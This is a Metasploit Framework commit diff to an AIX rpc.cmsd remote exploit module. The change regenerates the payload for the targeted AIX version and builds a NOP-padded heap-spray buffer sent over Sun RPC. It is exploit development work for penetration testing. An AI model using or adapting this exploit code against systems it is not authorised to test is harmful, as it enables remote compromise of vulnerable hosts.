Regenerate the payload with the specified AIX level

git-svn-id: file:///home/svn/framework3/trunk@8424 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/aix/rpc_cmsd_opcode21.rb

@@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'Arch'     => 'ppc',
 							'Platform' => 'aix',
-							'Ret'      => 0xcafebabe,
 							'AIX'      => '5.1',
-							'Payload'  => { 'AIX' => '5.1' },
 							'Bruteforce' =>
 							{
 								#'Start' => { 'Ret' => 0x20230168 },
@@ -76,6 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def brute_exploit(brute_target)
 
+		if not @aixpayload
+			datastore['AIX'] = target['AIX']
+			@aixpayload = regenerate_payload.encoded
+		end
+
 		print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
 
 		begin
@@ -84,8 +87,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 
 			# spray the heap a bit (work around powerpc cache issues)
-			buf = make_nops(1024 - payload.encoded.length)
-			buf << payload.encoded
+			buf = make_nops(1024 - @aixpayload.length)
+			buf << @aixpayload
 			xdr = XDR.encode(buf, buf)
 			10.times {
 				sunrpc_call(7, xdr, 2)
@@ -111,3 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 end
+